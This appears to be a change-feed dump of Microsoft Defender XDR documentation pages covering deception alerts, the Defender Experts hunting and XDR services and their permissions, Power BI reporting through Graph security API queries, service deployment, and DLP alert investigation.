-When an attacker uses a decoy or a lure on any Defender for Endpoint-onboarded client, the deception capability triggers an alert that indicates possible attacker activity, regardless of whether deception was deployed on the client or not.
-
-## Identify incidents and alerts activated by deception
-
-Alerts based on deception detection contain *deceptive* in the title. Some examples of alert titles are:
--- Sign-in attempt with a deceptive user account-- Connection attempt to a deceptive host-
-The alert details contain:
--- The *Deception* tag-- The decoy device or user account where the alert originated-- The type of attack like sign in attempts or lateral movement attempts-
-*Figure 2. Details of a deception-related alert*
-
-## Next step
--- [Configure the deception capability in Microsoft Defender XDR](configure-deception.md)-
security Defender Experts For Hunting https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/defender-experts-for-hunting.md
- Title: What is Microsoft Defender Experts for Hunting offering-
-description: Microsoft Defender Experts for Hunting is a proactive threat hunting service that goes beyond the endpoint to hunt across endpoints
-----
- - m365-security
- - tier1
- - essentials-overview
- Previously updated : 04/18/2024--
-# Microsoft Defender Experts for Hunting
--
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> [!IMPORTANT]
-> Microsoft Defender Experts for Hunting is sold separately from other Microsoft Defender XDR products. If you're a Microsoft Defender XDR customer and are interested in purchasing Defender Experts for Hunting, complete a [customer interest form](https://aka.ms/DEX4HuntingCustomerInterestForm).
-
-> [!NOTE]
-> Any incident response services offered by Defender Experts will be offered under the Defender Experts Service Terms.
-
-Microsoft Defender Experts for Hunting was created for customers who have a robust security operations center but want Microsoft to help them proactively hunt threats using Microsoft Defender data. Defender Experts for Hunting is a proactive threat hunting service that goes beyond the endpoint to hunt across endpoints, Office 365, cloud applications, and identity. Our experts will investigate anything they find, then hand off the contextual alert information along with remediation instructions, so you can quickly respond.
-
-The following capabilities included in this managed threat hunting service could also help with your daily SecOps work:
--- **Threat hunting and analysis** ΓÇô Defender Experts for Hunting look deeper to expose advanced threats and identify the scope and impact of malicious activity associated with human adversaries or hands-on-keyboard attacks.-- **Defender Experts Notifications** ΓÇô Notifications show up as incidents in Microsoft Defender XDR, helping to improve your security operations' incident response with specific information about the scope, method of entry, and remediation instructions.-- **Ask Defender Experts** ΓÇô Select [**Ask Defender Experts**](experts-on-demand.md) in the Microsoft Defender portal to get expert advice about threats your organization is facing. You can ask for help on a specific incident, nation-state actor, or attack vector-related notifications.-- **Hunter-trained AI** ΓÇô Our Defender Experts for Hunting share their learning back into the automated tools they use to improve threat discovery and prioritization.-- **Reports** ΓÇô An interactive report summarizing what we hunted and what we found.-
-[Watch this short video](https://youtu.be/4t1JgE0X0jc) to learn more about how Microsoft Defender Experts for Hunting can help you track the latest advanced threats in your environment.
-
-### Next step
--- [Before you begin using Defender Experts for Hunting](before-you-begin-defender-experts.md)
security Defender Experts Report https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/defender-experts-report.md
- Title: Understand the Defender Experts for Hunting report in Microsoft Defender XDR-
-description: The Defender Experts for Hunting service publishes reports to help you understand all the threats the hunting service surfaced in your environment
---- NOCSH------ m365-security -- tier1-- essentials-manage- Previously updated : 10/17/2023--
-# Understand the Defender Experts for Hunting report in Microsoft Defender XDR
--
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-Microsoft Defender Experts for Hunting layers human intelligence and expert-trained technology to help Microsoft Defender XDR customers understand the significant threats they face. It highlights how Defender Expert's threat hunting skills, thorough understanding of the threat landscape, and knowledge of emerging threats can help you identify, prioritize, and address those threats in your environment.
-
-The Defender Experts for Hunting service generates reports to help you understand all the threats the hunting service surfaced in your environment, alongside the alerts generated by your Microsoft Defender XDR products. You can view the report in the current (running) month, or in one-, three-, or six-month periods.
-
-To view the report in your Microsoft Defender portal, go to **Reports**, select **Defender Experts** > **Defender Experts for Hunting report**. Each section of the report is designed to provide more insights into the threats and suspicious activities our Defender Experts found in your environment.
-
-Refer to the following screenshot of a sample report:
-
-![Screenshot of a Defender Experts for Hunting report.](../../media/defender-experts/defender-experts-hunting-report.png)
-
-## Identify prevalent threats and other potential attack entry points
-
-Signals from Microsoft Defender XDR and investigations by Defender Experts for Hunting help identify suspicious activities in your environment. Significant threat activities will have corresponding [Defender Experts Notifications](/microsoft-365/security/defender/onboarding-defender-experts-for-hunting#receive-defender-experts-notifications), which also provide recommendations to remediate and defend your organization.
-
-The report provides you with the total number of Defender Experts Notifications our experts have sent for your chosen period:
-
-![Screenshot of the top section of the report showing the number of threats identified](../../media/defender-experts/report-top-section-dens.png)
-
-To view these notifications, select **View Defender Experts Notifications**. This button redirects you to the Microsoft Defender XDR incidents page. Defender Expert for Hunting alerts or Defender Experts Notifications are labeled with **Defender Experts**.
-
-> [!NOTE]
-> The **View Defender Experts Notifications** button only appears if the number of threats identified is at least 1.
-
-All other identified activities are summarized in a table in the **Threat categories** section of the report. The columns represent the different threat attack tactics and categories to help you visualize what an activity is trying to achieve in each attack phase so you can plan the corresponding containment and remediation actions.
-
-You can filter the activities displayed in the table by choosing any of the following options in the dropdown menu:
--- **Suspicious activities** (default) ΓÇô Displays identified true positive and benign true positive activities in your environment. Note that not all suspicious activities will have corresponding Defender Expert Notifications.-- **DEX notified** ΓÇô Displays activities with corresponding Defender Expert Notifications only.-- **All activities** ΓÇô Displays all true positive, benign true positive, and false positive activities. -
-![Screenshot of the top section of the Threat categories section showing the dropdown menu.](../../media/defender-experts/threat-categories-filter.png)
-
-If an activity has a related Defender Expert Notification, its corresponding icon also appears under the activity name.
-Selecting an identified suspicious activity opens a flyout panel detailing the impacted devices and users:
-
-![Screenshot of a flyout panel displaying a list of devices impacted by a detected suspicious activity.](../../media/defender-experts/suspicious-activity-detail-panel.png)
-
-If applicable, the page also provides links to view related Defender Expert Notifications.
-
-## Know and understand the security weak spots in your environment
-
-The **Top trending suspicious activities** section of the report identifies up to 20 suspicious activities that were consistently observed in your environment in the last three months, sorted based on their severity rating and frequency of occurrence:
-
-![Screenshot of the Top trending suspicious activities section of the report.](../../media/defender-experts/top-trending-suspicious-activities.png)
-
-By showing the most critical and frequently observed activities, you can assess and evaluate their impact and develop strategies to prevent or mitigate potential threats to your environment
-
-Select **View details** in each card to open a flyout panel detailing the impacted devices and users. If applicable, the page also provides links to view related Defender Expert Notifications.
security Defender Threat Intelligence https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/defender-threat-intelligence.md
- Title: Microsoft Defender Threat Intelligence in Microsoft Defender XDR-
-description: Learn what steps you need to take to get started with Defender Threat Intelligence in Microsoft Defender XDR
-----
- - m365-security
- - highpri
- - tier3
- Previously updated : 03/28/2021--
-# Microsoft Defender Threat Intelligence in Microsoft Defender XDR
-
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-Subscribers to Microsoft Defender Threat Intelligence (Defender TI) can now access threat intelligence from inside the Microsoft Defender portal.
-
-Microsoft Defender TI helps streamline security analyst triage, incident response, threat hunting, and vulnerability management workflows. Defender TI aggregates and enriches critical threat information in an easy-to-use interface.
-
-This change introduces a new navigation menu within the Microsoft Defender portal named **Threat Intelligence**.
-
-Under **Threat Intelligence** is the existing node for the **Threat Analytics** feature and two new additions:
--- **Intel Profiles** - a new feature that introduces curated content organized by threat actors, their tools and known vulnerabilities-- **Intel Explorer** - the existing Defender TI content, search and investigation experience-
-The experience between the existing Defender TI standalone portal differs slightly from the version in Microsoft Defender XDR. Though most of the functionality is available, at this time, the Defender TI experience in Microsoft Defender XDR doesn't include the ability to apply custom tags or project capabilities.
-
-[Learn more about Microsoft Defender Threat Intelligence](/defender/threat-intelligence/what-is-microsoft-defender-threat-intelligence-defender-ti).
security Defender Xdr Custom Reports https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/defender-xdr-custom-reports.md
- Title: Create custom Microsoft Defender XDR reports using Microsoft Graph security API and Power BI
-description: How to create custom Microsoft Defender XDR reports using Microsoft Graph security API and Power BI.
-
-ms.sitesec: library
-ms.pagetype: security
-- Previously updated : 01/03/2023----- m365-security-- tier2-
-# Create custom Microsoft Defender XDR reports using Microsoft Graph security API and Power BI
--
-**Applies to:**
-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-Empowering security professionals to visualize their data enables them to quickly recognize complex patterns, anomalies, and trends that might otherwise be lurking underneath the noise. With visualizations, SOC teams can rapidly identify threats, make informed decisions, and communicate insights effectively across the organization.
-
-There are multiple ways to visualize Microsoft Defender security data:
--- Navigating built-in reports in the Microsoft Defender portal.-- Using Microsoft Sentinel workbooks with prebuilt templates for every Defender product (requires integration with Microsoft Sentinel).-- Applying the render function in Advanced Hunting.-- Using Power BI to expand existing reporting capabilities.-
-In this article, we create a sample Security Operations Center (SOC) efficiency dashboard in Power BI using Microsoft Graph security API. We access it in user context, therefore user must have [corresponding permissions](manage-rbac.md) to be able to view alerts and incidents data.
-
-> [!NOTE]
-> **Example below is based on our new MS Graph security API**. Find out more at: [Use the Microsoft Graph security API](/graph/api/resources/security-api-overview).
-
-## Importing data into Power BI
-
-In this section, we go through the steps required to get Microsoft Defender XDR data into Power BI, using Alerts data as an example.
-
-1. Open Microsoft Power BI Desktop.
-2. Select **Get Data > Blank Query**.
-3. Select **Advanced Editor**.
-
- :::image type="content" source="../../media/defender/power-bi/manage-parameters.png" alt-text="Screenshot that shows how to create a new data query in Power BI Desktop." lightbox="../../media/defender/power-bi/manage-parameters.png":::
-
-4. Paste in Query:
-
- ```console
- let
- Source = OData.Feed("https://graph.microsoft.com/v1.0/security/alerts_v2", null, [Implementation="2.0"])
- in
- Source
- ```
-
-5. Select **Done**.
-6. When you're prompted for credentials, select **Edit Credentials**:
-
- :::image type="content" source="../../media/defender/power-bi/edit-credentials-api.png" alt-text="Screenshot of how to edit credentials for API connection." lightbox="../../media/defender/power-bi/edit-credentials-api.png":::
-
-7. Select **Organizational account > Sign in**.
-
- :::image type="content" source="../../media/defender/power-bi/sign-in-org-account.png" alt-text="Screenshot of the organizational account authentication window." lightbox="../../media/defender/power-bi/sign-in-org-account.png":::
-
-8. Enter credentials for account with access to Microsoft Defender XDR incidents data.
-9. Select **Connect**.
-
-Now the results of your query appear as a table, and you can start building visualizations on top of it.
-
-> [!TIP]
-> If you are looking to visualize other forms of Microsoft Graph security data like Incidents, Advanced Hunting, Secure Score, etc., see [Microsoft Graph security API Overview](/graph/api/resources/security-api-overview).
-
-## Filtering data
-
-Microsoft Graph API supports OData protocol so that users don't have to worry about pagination - or requesting the next set of data. However, filtering data is essential to improving load times in a busy environment.
-
-Microsoft Graph API supports [query parameters](/graph/filter-query-parameter). Here are few examples of filters used in the report:
--- The following query returns the list of alerts generated over the past three days. Using this query in environments with high volumes of data might result in hundreds of megabytes of data that could take a moment to load. By using this hardcoded approach, you're able to quickly see your most recent alerts over the last three days as soon as you open the report.-
- ```console
- let
- AlertDays = "3",
- TIME = "" & Date.ToText(Date.AddDays(Date.From(DateTime.LocalNow()), -AlertDays), "yyyy-MM-dd") & "",
- Source = OData.Feed("https://graph.microsoft.com/v1.0/security/alerts_v2?$filter=createdDateTime ge " & TIME & "", null, [Implementation="2.0"])
- in
- Source
- ```
--- Instead of collecting data across a date range, we can gather alerts across more precise dates by inputting a date using the YYYY-MM-DD format.-
- ```console
- let
- StartDate = "YYYY-MM-DD",
- EndDate = "YYYY-MM-DD",
- Source = OData.Feed("https://graph.microsoft.com/v1.0/security/ alerts_v2?$filter=createdDateTime ge " & StartDate & " and createdDateTime lt " & EndDate & "", null, [Implementation="2.0"])
- in
- Source
- ```
--- When historical data is required (for example, comparing the number of incidents per month), filtering by date isn't an option (since we want to go as far back as possible). In this case, we need to pull a few selected fields as shown in the following example:-
- ```console
- let
- Source = OData.Feed("https://graph.microsoft.com/v1.0/security/alerts_v2?$filter=createdDateTime ge " & StartLookbackDate & " and createdDateTime lt " & EndLookbackDate &
- "&$select=id,title,severity,createdDateTime", null, [Implementation="2.0"])
- in
- Source
- ```
-
-## Introducing parameters
-
-Instead of constantly querying the code to adjust the timeframe, use parameters to set a Start and End Date each time you open the report.
-
-1. Go to **Query Editor**.
-2. Select **Manage Parameters** \> **New Parameter**.
-3. Set desired parameters.
-
- In the following example, we use two different time frames, Start and End dates.
-
- :::image type="content" source="../../media/defender/power-bi/manage-parameters.png" alt-text="Screenshot of how to manage Parameters in Power BI." lightbox="../../media/defender/power-bi/manage-parameters.png":::
-
-4. Remove hardcoded values from the queries and make sure that StartDate and EndDate variable names correspond to parameter names:
-
- ```console
- let
- Source = OData.Feed("https://graph.microsoft.com/v1.0/security/incidents?$filter=createdDateTime ge " & StartDate & " and createdDateTime lt " & EndDate & "", null, [Implementation="2.0"])
- in
- Source
- ```
-
-## Reviewing the report
-
-Once the data has been queried and the parameters are set, now we can review the report. During the first launch of the PBIT report file, you're prompted to provide the parameters that we specified earlier:
--
-The dashboard offers three tabs intended to provide SOC insights. The first tab provides a summary of all recent alerts (depending on the selected timeframe). This tab helps analysts clearly understand the security state over their environment using alert details broken down by detection source, severity, total number of alerts and mean-time-to-resolution.
--
-The second tab offers more insight into the attack data collected across the incidents and alerts. This view can provide analysts with greater perspective into the types of attacks executed and how they map to the MITRE ATT&CK framework.
--
-## Power BI dashboard samples
-
-For more information, see the [Power BI report templates sample file](https://download.microsoft.com/download/0/1/6/01686830-b4e4-4cc1-af5b-7e07eab3ff55/defender-xdr-soc-overview.zip).
-
-## Related articles
--- [Use Microsoft Graph security API](/graph/api/resources/security-api-overview)
security Deploy Configure M365 Defender https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/deploy-configure-m365-defender.md
- Title: Setup guides for Microsoft Defender XDR
-description: Learn how to deploy and configure Microsoft Defender XDR by using online setup guides
-
- - NOCSH
----
- - m365-security
- - tier3
-
- - MOE150
- - MET150
Previously updated : 03/31/2023--
-# Setup guides for Microsoft Defender XDR
--
-**Applies to:**
-- Microsoft Defender XDR-
-Setup guides for Microsoft Defender XDR deployment give you tailored guidance and resources for planning and deploying security controls for your tenant, apps, and services.
-
-All deployment guides are available in the [Microsoft 365 admin center](https://go.microsoft.com/fwlink/?linkid=2224913) and in the [Microsoft 365 Setup portal](https://go.microsoft.com/fwlink/?linkid=2230646).
-
-## Deployment Guides
-
-Deployment guides in the admin center require authentication to a Microsoft 365 tenant as an administrator or other role with access to the admin center, but guides in the Microsoft 365 Setup portal can be accessed by anyone. We have provided links to both locations for each guide, where available, in the tables below.
-
-|**Guide - [Setup Portal](https://go.microsoft.com/fwlink/?linkid=2220880)** |**Guide - [Admin Center](https://go.microsoft.com/fwlink/?linkid=2224913)** |**Description** |
-||||
-| [Microsoft Defender for Endpoint setup guide](https://go.microsoft.com/fwlink/?linkid=2223155) | [Microsoft Defender for Endpoint setup guide](https://go.microsoft.com/fwlink/?linkid=2224785) |The **Microsoft Defender for Endpoint setup guide** provides instructions that will help your enterprise network prevent, detect, investigate, and respond to advanced threats. Make an informed assessment of your organization's vulnerability and decide which deployment package and configuration methods are best. <br> **Note**: A Microsoft Volume License is required for Microsoft Defender for Endpoint. |
-|[Microsoft Defender for Office 365 setup guide ](https://go.microsoft.com/fwlink/?linkid=2222971) | [Microsoft Defender for Office 365 setup guide ](https://go.microsoft.com/fwlink/?linkid=2224784) | The **Microsoft Defender for Office 365 setup guide** safeguards your organization against malicious threats that your environment might come across through email messages, links, and third party collaboration tools. This guide provides you with the resources and information to help you prepare and identify the Defender for Office 365 plan to fit your organization's needs. |
-|[Microsoft Defender for Cloud Apps setup guide](https://go.microsoft.com/fwlink/?linkid=2222969) | [Microsoft Defender for Cloud Apps setup guide](https://go.microsoft.com/fwlink/?linkid=2224814) | The **Microsoft Defender for Cloud Apps setup guide** provides easy to follow deployment and management guidance to set up your Cloud Discovery solution. With Cloud Discovery, you'll integrate your supported security apps, and then you'll use traffic logs to dynamically discover and analyze the cloud apps that your organization uses. You'll also set up features available through the Defender for Cloud Apps solution, including threat detection policies to identify high-risk use, information protection policies to define access, and real-time session controls to monitor activity. With these features, your environment gets enhanced visibility, control over data movement, and analytics to identify and combat cyberthreats across all your Microsoft and third party cloud services. |
-|[Microsoft Defender for Identity setup guide](https://go.microsoft.com/fwlink/?linkid=2222970)|[Microsoft Defender for Identity setup guide](https://go.microsoft.com/fwlink/?linkid=2224783)|The **Microsoft Defender for Identity setup guide** provides security solution set-up guidance to identify, detect, and investigate advanced threats that might compromise user identities. These include detecting suspicious user activities and malicious insider actions directed at your organization. You'll create a Defender for Identity instance, connect to your organization's Active Directory, and then set up sensors, alerts, notifications, and configure your unique portal preferences.|
-
-## Related topics
--- [Microsoft Defender XDR overview](microsoft-365-defender.md)-- [Turn on Microsoft Defender XDR](m365d-enable.md)-- [Deploy supported services](deploy-supported-services.md)-- [Microsoft Defender for Endpoint overview](../defender-endpoint/microsoft-defender-endpoint.md)-- [Microsoft Defender for Office 365 overview](../office-365-security/defender-for-office-365.md)-- [Microsoft Defender for Cloud Apps overview](/cloud-app-security/what-is-cloud-app-security)
security Deploy Supported Services https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/deploy-supported-services.md
- Title: Deploy services supported by Microsoft Defender XDR
-description: Learn about the Microsoft security services that can be integrated by Microsoft Defender XDR, their licensing requirements, and deployment procedures
-
- - NOCSH
----
- - m365-security
- - m365solution-getstarted
- - highpri
- - tier1
-
- - MOE150
- - MET150
Previously updated : 02/16/2021--
-# Deploy supported services
---
-**Applies to:**
-- Microsoft Defender XDR--
-[Microsoft Defender XDR](microsoft-365-defender.md) integrates various Microsoft security services to provide centralized detection, prevention, and investigation capabilities against sophisticated attacks. This article describes the supported services, their licensing requirements, the advantages and limitations associated with deploying one or more services, and links to how you can fully deploy them individually.
-
-## Supported services
-
-A Microsoft 365 E5, E5 Security, A5, or A5 Security license or a valid combination of licenses provides access to the following supported services and entitles you to use Microsoft Defender XDR. [See licensing requirements](prerequisites.md#licensing-requirements)
-
-| Supported service | Description |
-| | |
-| Microsoft Defender for Endpoint | Endpoint protection suite built around powerful behavioral sensors, cloud analytics, and threat intelligence |
-|Microsoft Defender for Office 365 | Advanced protection for your apps and data in Office 365, including email and other collaboration tools |
-| Microsoft Defender for Identity | Defend against advanced threats, compromised identities, and malicious insiders using correlated Active Directory signals |
-| Microsoft Defender for Cloud Apps | Identify and combat cyberthreats across your Microsoft and third-party cloud services |
-
-## Deployed services and functionality
-
-Microsoft Defender XDR provides better visibility, correlation, and remediation as you deploy more supported services.
-
-### Benefits of full deployment
-
-To get the complete benefits of Microsoft Defender XDR, we recommend deploying all supported services. Here are some of the key benefits of full deployment:
--- Incidents are identified and correlated based on alerts and event signals from all available sensors and service-specific analysis capabilities-- Automated investigation and remediation (AIR) playbooks apply across various entity types, including devices, mailboxes, and user accounts-- A more comprehensive advanced hunting schema can be queried for event and entity data from devices, mailboxes, and other entities-
-### Limited deployment scenarios
-
-Each supported service that you deploy provides an extremely rich set of raw signals as well as correlated information. While limited deployment doesn't cause Microsoft Defender XDR functionality to turn off, its ability to provide comprehensive visibility across your endpoints, apps, data, and identities is affected. At the same time, any remediation capabilities only apply to entities that can be managed by the services you've deployed.
-
-The table below lists how each supported service provides additional data, opportunities to obtain additional insight by correlating the data, and better remediation and response capabilities.
-
-| Service | Data (signals & correlated info) | Remediation & response scope |
-| | | |
-| Microsoft Defender for Endpoint |<ul><li>Endpoint states and raw events</li><li>Endpoint detections and alerts, including antivirus, EDR, attack surface reduction</li><li>Info on files and other entities observed on endpoints</li></ul> | Endpoints |
-|Microsoft Defender for Office 365 |<ul><li>Mail and mailbox states and raw events</li><li>Email, attachment, and link detections</li></ul> | <ul><li>Mailboxes</li><li>Microsoft 365 accounts</li></ul> |
-| Microsoft Defender for Identity |<ul><li>Active Directory signals, including authentication events</li><li>Identity-related behavioral detections</li></ul> | Identities |
-| Microsoft Defender for Cloud Apps |<ul><li>Detection of unsanctioned cloud apps and services (shadow IT)</li><li>Exposure of data to cloud apps</li><li>Threat activity associated with cloud apps</li></ul> | Cloud apps |
-
-## Deploy the services
-
-Deploying each service typically requires provisioning to your tenant and some initial configuration. See the following table to understand how each of these services is deployed.
-
-| Service | Provisioning instructions | Initial configuration |
-| | | |
-| Microsoft Defender for Endpoint | [Microsoft Defender for Endpoint deployment guide](../defender-endpoint/deployment-phases.md) | *See provisioning instructions* |
-|Microsoft Defender for Office 365 | *None, provisioned with Office 365* | [Configure Microsoft Defender for Office 365 policies](/microsoft-365/security/office-365-security/defender-for-office-365#configure-atp-policies) |
-| Microsoft Defender for Identity | [Quickstart: Create your Microsoft Defender for Identity instance](/azure-advanced-threat-protection/install-atp-step1) | *See provisioning instructions* |
-| Microsoft Defender for Cloud Apps | *None* | [Quickstart: Get started with Microsoft Defender for Cloud Apps](/cloud-app-security/getting-started-with-cloud-app-security) |
-
-Once you've deployed the supported services, [turn on Microsoft Defender XDR](m365d-enable.md).
-
-## Related topics
--- [Microsoft Defender XDR overview](microsoft-365-defender.md)-- [Turn on Microsoft Defender XDR](m365d-enable.md)-- [Setup guides for Microsoft Defender XDR](deploy-configure-m365-defender.md)-- [Microsoft Defender for Endpoint overview](../defender-endpoint/microsoft-defender-endpoint.md)-- [Microsoft Defender for Office 365 overview](../office-365-security/defender-for-office-365.md)-- [Microsoft Defender for Cloud Apps overview](/cloud-app-security/what-is-cloud-app-security)-- [Microsoft Defender for Identity overview](/azure-advanced-threat-protection/what-is-atp)
security Dex Xdr Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/dex-xdr-overview.md
- Title: What is Microsoft Defender Experts for XDR offering-
-description: Defender Experts for XDR augments your SOC with a combination of automation and human expertise
------
- - m365-security
- - tier1
- - essentials-overview
- Previously updated : 08/08/2023--
-# Microsoft Defender Experts for XDR
-
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> [!IMPORTANT]
-> Microsoft Defender Experts for XDR is sold separately from other Microsoft Defender XDR products. If you're a Microsoft Defender XDR customer and are interested in purchasing Defender Experts for XDR, please contact your account manager.
-
-> [!NOTE]
-> Any incident response services offered by Defender Experts will be offered under the Defender Experts Service Terms.
-
-Microsoft Defender Experts for XDR is a managed extended detection and response service that helps your security operations centers (SOCs) focus and accurately respond to incidents that matter. It provides extended detection and response for customers who use Microsoft Defender XDR
-
-Defender Experts for XDR augments your SOC by combining automation and Microsoft's security analyst expertise, helping you detect and respond to threats with confidence and improve your security posture. With deep product expertise powered by threat intelligence, we're uniquely positioned to help you:
--- **Focus on incidents that matter** - Our experts prioritize incidents and alerts that matter, alleviate alert fatigue, and drive SOC efficiency for your team-- **Manage response your way** - Our experts provide detailed, step-by-step, actionable guidance to respond to incidents with the option to act on your behalf as needed-- **Access expertise when you need it** - Extend your team's capacity with access to Defender Experts for assistance on an investigation-- **Stay ahead of emerging threats** - Our experts proactively hunt for emerging threats in your environment, informed by unparalleled threat intelligence and visibility-
-In addition to the constantly updated research and intelligence tailored for the threats currently seen across the various Microsoft Defender XDR signals, you'll receive managed response from our security analysts and support from Microsoft's security-focused service delivery managers (SDMs). This service lets you enjoy the following capabilities:
--- **Managed detection and response** - Expert analysts manage your Microsoft Defender XDR incident queue and handle triage and investigation on your behalf; they partner with you and your team to take action or guide you to respond to incidents-- **Proactive threat hunting** - [Microsoft Defender Experts for Hunting](../defender/defender-experts-for-hunting.md) is built in to extend your team's threat hunting capabilities and prioritize significant threats-- **Live dashboards and reports** - Transparent view of our operations on your behalf and noise free, actionable view into what matters for you coupled with detailed analytics-- **Proactive check-ins for continuous security improvements** - Periodic check-ins with your named service delivery team to guide your Defender Experts for XDR experience and improve your security posture-
-### Next step
-
-[Before you begin](before-you-begin-xdr.md)
security Dex Xdr Permissions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/dex-xdr-permissions.md
- Title: How Microsoft Defender Experts for XDR permissions work-
-description: Configuring permissions in customer's XDR tenants
------
- - m365-security
- - tier1
- Previously updated : 05/29/2023--
-# How Microsoft Defender Experts for XDR permissions work
-
-**Applies to:**
--- [Microsoft Defender XDR](microsoft-365-defender.md)-
-For Microsoft Defender Experts for XDR incident investigations, when our experts need access to your tenants, we follow the just-in-time and least privilege principles to provide the right level of access at the right time. To deliver on these requirements, we built the Microsoft Defender Experts permissions platform using the following capabilities in Microsoft Entra ID:
--- **Granular delegated admin privileges (GDAP)**: As part of onboarding, we provision the Microsoft Experts tenant as a service provider on your tenant to use the GDAP capability and get the right access level to our experts. The roles granted to our experts are configured using [cross-tenant role assignment](/azure/active-directory/external-identities/cross-tenant-access-overview) to ensure that they only have permissions that you have explicitly granted to them.-- **Microsoft Entra cross-tenant access policies**: To enforce restrictions on our experts' access to your tenant, we need to establish a cross-tenant trust between our experts and your tenant. To enable this trust, we configure a cross-tenant access policy in your tenant as part of onboarding. These cross-tenant access policies are created with read-only permissions to avoid any disruption.-- **Conditional access for external users**: We restrict our experts' access to your tenants from our secure environment by using compliant devices with strong multifactor authentication (MFA). To enforce the trust settings configured in cross-tenant access policy and block access otherwise, we configure these conditional access policies in your tenant. -- **Just-in-time (JIT) access**: Even after you have permitted our experts access to your environment, we limit their access based on JIT permissions for case investigation, with limited duration for each role. Our experts must first request access and get approval in our internal system to gain the appropriate role in your tenant. Our experts' access to your tenant is audited as part of Microsoft Entra sign-in logs for you to review-
-## Configuring permissions in customer tenants
-
-Once you select the permissions you'd like to grant to our experts, we create the following policies in your tenant using the Security Administrator or Global Administrator context:
--- **Configure Microsoft Experts as a service provider** ΓÇô This setting lets our experts access the tenant environment as external collaborators without requiring you to create accounts for them.-- **Configure role assignments for our experts** ΓÇô This setting controls the roles our experts are allowed in the tenant. You select the appropriate roles during the onboarding process-- **Configure cross-tenant access settings with MFA and compliant device as the trust settings** ΓÇô This setting configures a trust relationship between customer and Microsoft Experts tenants based on MFA and device compliance in the Microsoft Experts tenant. This policy can be found under **Microsoft Entra ID** > **External Identities** > **Cross-tenant access Settings** with the name _Microsoft Experts_.-- **Configure conditional access policies** ΓÇô These policies restrict our experts to only access your tenant from the Microsoft Experts secure workstations with MFA verification. Two policies are configured with the naming convention _Microsoft Security Experts-\<policy name\>-DO NOT DELETE_.-
-These policies are configured during the onboarding process and require the relevant administrator to stay signed in to complete the steps. Once the above policies are created and the permissions setup is considered complete, you'll see a notification that the setup is complete.
-
-### See also
-
-[Important considerations for Microsoft Defender Experts for XDR](additional-information-xdr.md)
security Dlp Investigate Alerts Defender https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/dlp-investigate-alerts-defender.md
- Title: Investigate data loss alerts with Microsoft Defender XDR
-description: Investigate data loss in Microsoft Defender XDR.
- - NOCSH
-----
- - m365-security
- - tier2
-
- - MOE150
- - met150
Previously updated : 11/14/2023--
-# Investigate data loss prevention alerts with Microsoft Defender XDR
--
-**Applies to:**
--- Microsoft Defender XDR-
-You can manage Microsoft Purview Data Loss Prevention (DLP) alerts in the Microsoft Defender portal. Open **Incidents & alerts** \> **Incidents** on the quick launch of the <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>. From this page, you can:
--- View all your DLP alerts grouped under incidents in the Microsoft Defender XDR incident queue.-- View intelligent inter-solution (DLP-MDE, DLP-MDO) and intra-solution (DLP-DLP) correlated alerts under a single incident.-- Hunt for compliance logs along with security under Advanced Hunting.-- In-place admin remediation actions on user, file, and device.-- Associate custom tags to DLP incidents and filter by them.-- Filter by DLP policy name, tag, Date, service source, incident status, and user on the unified incident queue.-
-> [!TIP]
-> You can also pull DLP incidents along with events and evidence into Microsoft Sentinel for investigation and remediation with the Microsoft Defender XDR connector in Microsoft Sentinel.
-
-## Licensing requirements
-
-To investigate Microsoft Purview Data Loss Prevention incidents in the Microsoft Defender portal, you need a license from one of the following subscriptions:
--- Microsoft Office 365 E5/A5-- Microsoft 365 E5/A5-- Microsoft 365 E5/A5 Compliance-- Microsoft 365 E5/A5 Information Protection and Governance-
-> [!NOTE]
-> When you are licensed and eligible for this feature, DLP alerts will automatically flow into Microsoft Defender XDR. If you don't want DLP alerts to flow into Defender, open a support case to disable this feature. If you disable this feature DLP alerts will surface in the Defender portal as Microsoft Defender for Office alerts.
-
-## Roles
-
-It's best practice to only grant minimal permissions to alerts in the Microsoft Defender portal. You can create a custom role with these roles and assign it to the users who need to investigate DLP alerts.
-
-|Permission |Defender Alert Access |
-|||
-|Manage Alerts | DLP + Security |
-|View-Only Manage Alerts |DLP + Security |
-|Information Protection Analyst |DLP only |
-|DLP Compliance Management |DLP only |
-|View-Only DLP Compliance Management |DLP only |
-
-## Before you start
-
-[Turn on alerts for all your DLP policies](/purview/dlp-create-deploy-policy) in the <a href="https://purview.microsoft.com" target="_blank">Microsoft Purview compliance portal</a>.
-
-> [!NOTE]
-> [Administrative units](/microsoft-365/compliance/microsoft-365-compliance-center-permissions#administrative-units) restrictions flow from data loss prevention (DLP) into the Defender portal. If you are an administrative unit restricted admin, you'll only see the DLP alerts for your administrative unit.
-
-<a name='investigate-dlp-alerts-in-the-microsoft-365-defender-portal'></a>
-
-## Investigate DLP alerts in the Microsoft Defender portal
-
-1. Go to the Microsoft Defender portal, and select **Incidents** in the left hand navigation menu to open the incidents page.
-
-1. Select **Filters** on the top right, and choose **Service Source : Data Loss Prevention** to view all incidents with DLP alerts. Here's a few examples of the subfilters that are available in preview:
- 1. by user and device names
- 1. (in preview) In the **Entities** filter, you can search on file names, user, device names, and file paths.
- 1. (in preview) In the **Incidents** queue > **Alert policies** > Alert policy title. You can search on the DLP policy name.
-
-1. Search for the DLP policy name of the alerts and incidents you're interested in.
-
